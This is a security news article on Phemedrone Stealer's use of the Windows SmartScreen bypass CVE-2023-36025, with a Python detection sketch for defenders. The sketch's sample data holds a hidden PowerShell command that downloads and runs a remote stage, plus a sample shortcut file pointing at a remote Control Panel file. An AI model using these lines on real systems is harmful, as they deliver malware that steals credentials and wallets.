
Phemedrone Stealer: Exploiting Windows Vulnerabilities for Information Theft

A Deep Dive into the Tactics Employed by Threat Actors Post-Windows Security Patch

NEWS | Security | January 16, 2024 | Reading time: 2 minutes

Max (RS editor)


In recent cybersecurity developments, threat actors have demonstrated their adaptability by exploiting a now-patched security flaw in Microsoft Windows. This article walks through the multi-stage attack chain these actors built around the flaw and their use of a notorious information stealer called Phemedrone Stealer.

The Exploited Flaw: CVE-2023-36025

At the core of these attacks is CVE-2023-36025, a security bypass vulnerability in Windows SmartScreen. The flaw allowed threat actors to sidestep Windows Defender SmartScreen protections by enticing users to click on specially crafted Internet Shortcut (.URL) files or hyperlinks. Microsoft addressed the vulnerability in its November 2023 Patch Tuesday updates; systems that have not applied that update remain exposed to the chain described below.

Phemedrone Stealer: A Stealthy Information Thief

The weapon of choice for threat actors in these attacks is Phemedrone Stealer, an open-source information stealer actively maintained on GitHub and Telegram. This malware is designed to target web browsers and extract sensitive data from cryptocurrency wallets and popular messaging apps, including Telegram, Steam, and Discord. Phemedrone Stealer goes beyond mere data theft, as it captures screenshots and collects detailed system information such as hardware specifics, location, and operating system details. The stolen data is discreetly transmitted to the attackers via Telegram or their command-and-control (C&C) server.

The Malicious Flow: Exploiting Windows Control Panel

The infection process starts with malicious Internet Shortcut files hosted on platforms such as Discord or cloud services such as FileTransfer.io, with the links further concealed behind URL shorteners. When the victim clicks the disguised link, the booby-trapped .URL file is executed and connects to an actor-controlled server. The server delivers a Control Panel (.CPL) file, and executing it takes advantage of CVE-2023-36025 to bypass Windows Defender SmartScreen.

Phemedrone Stealer Unveiled

The malicious .CPL file, when executed through the Windows Control Panel process binary, initiates a sequence involving rundll32.exe and a malicious DLL. This DLL acts as a loader, prompting Windows PowerShell to download and execute the next stage of the attack from a GitHub repository. The subsequent payload is a PowerShell loader ("DATA3.txt") that serves as a launchpad for Donut, an open-source shellcode loader. Donut decrypts and executes the Phemedrone Stealer, allowing threat actors to extract sensitive information from compromised systems.
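The chain just described (.URL pointing at a remote .CPL, the .CPL launched through the Control Panel binary and rundll32.exe, then PowerShell pulling the next stage) leaves a recognisable trail in endpoint telemetry. The following detection sketch is an added example and is not code from the article or from any vendor report. It assumes process-creation events shaped like Sysmon Event ID 1 (parent image, image, command line); the .URL body, the server address 203.0.113.5 and the GitHub path are constructed placeholders, and the "outside System32" rule is a heuristic chosen here, not a published signature.

```python
"""Two defender-side checks for the .URL -> .CPL -> rundll32 -> PowerShell chain.

Added illustration, not code from the article. Event field names follow the
Sysmon Event ID 1 layout as an assumption; all sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# ---- Check 1: static inspection of an Internet Shortcut (.URL) file -----------

def parse_url_file(text: str) -> dict:
    """Parse the INI-like .URL body; returns the keys under [InternetShortcut]."""
    fields, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields

# A benign shortcut targets a web page; a UNC or file:// target ending in
# .cpl means "open a Control Panel applet fetched from a remote host".
REMOTE_CPL = re.compile(r"^(?:\\\\|file://)\S*\.cpl$", re.IGNORECASE)

def url_file_is_suspicious(text: str) -> bool:
    return bool(REMOTE_CPL.match(parse_url_file(text).get("url", "")))

SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.5/share/invoice.cpl
"""  # constructed sample; 203.0.113.0/24 is a documentation range

# ---- Check 2: process-tree heuristics over process-creation events ----------

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

CPL_PATH = re.compile(r'([^"\s]+\.cpl)')          # first .cpl path on the command line
DOWNLOAD_HINT = re.compile(r"downloadstring|invoke-webrequest|net\.webclient|\biwr\b")

def classify_event(ev: ProcEvent) -> Optional[str]:
    parent, child, cmd = _base(ev.parent_image), _base(ev.image), ev.command_line.lower()
    # Stage 1: control.exe hands a .cpl to rundll32. Built-in applets live in
    # System32, so a .cpl anywhere else (Downloads, temp, UNC) is the signal.
    if parent == "control.exe" and child == "rundll32.exe":
        m = CPL_PATH.search(cmd)
        if m and "\\windows\\system32\\" not in m.group(1):
            return "cpl_via_control_panel"
    # Stage 2: the loader DLL inside rundll32 spawns PowerShell with a download primitive.
    if parent == "rundll32.exe" and child in ("powershell.exe", "pwsh.exe") and DOWNLOAD_HINT.search(cmd):
        return "rundll32_spawns_powershell_downloader"
    return None

def detect_chain(events: List[ProcEvent]) -> Tuple[List[str], bool]:
    """Return the stage labels seen, and whether both stages appeared."""
    stages = [s for s in (classify_event(e) for e in events) if s]
    full = {"cpl_via_control_panel", "rundll32_spawns_powershell_downloader"} <= set(stages)
    return stages, full

SAMPLE_EVENTS = [  # constructed events, in the order the chain would produce them
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\control.exe",
              r'"C:\Windows\System32\control.exe" "C:\Users\victim\Downloads\invoice.cpl"'),
    ProcEvent(r"C:\Windows\System32\control.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\victim\Downloads\invoice.cpl"'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/DATA3.txt')\""),
    # Benign control: a user opening the built-in Date and Time applet.
    ProcEvent(r"C:\Windows\System32\control.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\timedate.cpl"'),
]

if __name__ == "__main__":
    print("suspicious .URL:", url_file_is_suspicious(SAMPLE_URL_FILE))
    print("stages, full chain:", detect_chain(SAMPLE_EVENTS))
```

The two checks are deliberately independent: the .URL parser can run at the mail or download gateway before anything executes, while the process-tree rule runs on endpoint telemetry and still fires on a machine where SmartScreen was bypassed. Requiring both stages before raising a high-severity alert keeps the benign Control Panel applet (the last sample event) from paging anyone.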

Continuous Threat Evolution

This incident underscores the agility of threat actors who, even after a patch ships, keep finding ways to exploit vulnerabilities such as CVE-2023-36025 on systems that have not applied it. Their ability to adapt quickly and capitalize on newly disclosed exploits illustrates the evolving nature of cyber threats. The implications are far-reaching, because the same tactics serve not only information theft, as seen with Phemedrone Stealer, but also the distribution of other malware, including ransomware.

Cover image by Vectorjuice on Freepik / Review Space
